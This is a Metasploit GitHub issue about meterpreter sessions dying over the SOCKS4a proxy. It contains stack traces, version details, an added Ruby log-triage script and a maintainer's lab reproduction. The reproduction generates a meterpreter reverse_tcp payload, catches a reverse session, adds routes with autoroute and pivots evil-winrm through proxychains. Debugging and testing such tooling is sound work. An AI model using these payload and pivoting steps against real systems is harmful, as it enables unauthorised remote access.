/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:315:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:314:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 22:03:12] [w(0)] core: Session 1 has died
[10/21/2023 22:58:59] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 22:59:03] [w(0)] core: Session 2 has died

Web Service Logs

The following web service logs were recorded before the issue occurred:

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Framework: 6.3.38-dev
Ruby: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.8 7 Feb 2023
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
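
An added example, not part of the original report and not Metasploit's own code: a Ruby script that triages a framework.log excerpt like the one above, counting the `Thread Exception` entries logged before each `Session N has died` line and the gap between the last of them and the session death. The sample input is abridged from the log lines in this report; the function names are hypothetical.

```ruby
# SAMPLE_LOG is abridged from the framework log in this report. Its first line
# is an orphaned trace line whose entry header was cut off, as in the excerpt.
SAMPLE_LOG = <<~'LOG'
      /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
  [10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
      /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:315:in `block in start'
      /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
  Call stack:
  /usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
  [10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
      /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:314:in `block in start'
      /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
  [10/21/2023 22:03:12] [w(0)] core: Session 1 has died
  [10/21/2023 22:59:03] [w(0)] core: Session 2 has died
LOG

HEADER = %r{\A\[(\d{2})/(\d{2})/(\d{4}) (\d{2}):(\d{2}):(\d{2})\] \[\w\(\d\)\] \w+: (.*)\z}
ERROR_TAIL = /' - ((?:[A-Z]\w*::)*[A-Z]\w*) (.+)\z/

def parse_entries(text)
  entries = []
  text.each_line(chomp: true) do |line|
    if (m = HEADER.match(line))
      mon, day, year, hour, min, sec = m.captures.first(6).map(&:to_i)
      entries << { time: Time.utc(year, mon, day, hour, min, sec), message: m[7],
                   thread: m[7][/\AThread Exception: (\S+)/, 1],
                   session: m[7][/\ASession (\d+) has died\z/, 1]&.to_i }
    elsif entries.any? && (e = ERROR_TAIL.match(line))
      entries.last[:error] ||= "#{e[1]} #{e[2]}" # first error line of the entry
    end # trace lines seen before any header are skipped
  end
  entries
end

# For each "Session N has died" line, summarise the thread exceptions logged
# since the previous session death and the gap to the last of them.
def triage(text)
  window = []
  parse_entries(text).each_with_object([]) do |entry, report|
    window << entry if entry[:thread]
    next unless entry[:session]
    report << { session: entry[:session],
                exceptions: window.map { |e| [e[:thread], e[:error]] }.tally,
                seconds_after_last_exception: window.empty? ? nil : (entry[:time] - window.last[:time]).to_i }
    window = []
  end
end

triage(SAMPLE_LOG).each { |row| puts row.inspect } if __FILE__ == $PROGRAM_NAME
```

On the abridged sample, session 1 is reported with two `SOCKS4AProxyServerRelay` send timeouts 422 seconds before it died, while session 2 has no preceding thread exceptions.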

@zgoldman-r7
Contributor

zgoldman-r7 commented Nov 9, 2023

I've been able to run through the recreation steps multiple times in a row with no issues.

zgoldman@AUS-MBP-10311 metasploit-framework % ./msfconsole -q
msf6 payload(windows/meterpreter/reverse_http) > use windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 192.168.2.1
lhost => 192.168.2.1
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o payload.exe
[*] Writing 7168 bytes to payload.exe...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.2.1:4444
msf6 payload(windows/x64/meterpreter/reverse_tcp) >
[*] Sending stage (200774 bytes) to 192.168.2.136
[*] Meterpreter session 1 opened (192.168.2.1:4444 -> 192.168.2.136:50151) at 2023-11-10 09:59:10 -0600

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use autoroute

[...]

[*] Using post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > exploit

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against DESKTOP-4CJ773T
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.2.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth Device (Personal Area Network).
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > use socks_proxy

[...]

[*] Using auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > exploit -j
[*] Auxiliary module running as background job 1.

[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) >
zgoldman@AUS-MBP-10311 metasploit-framework % proxychains4 evil-winrm -i ip_here -u username_here -p password_here
[proxychains] config file found: /Users/zgoldman/Documents/R7Code/metasploit-framework/proxychains.conf
[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.16/lib/libproxychains4.dylib

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\vmware-host\Shared Folders\Documents>

@zgoldman-r7 zgoldman-r7 added confirmed Issues confirmed by a committer and removed confirmed Issues confirmed by a committer labels Nov 9, 2023

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Dec 11, 2023

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
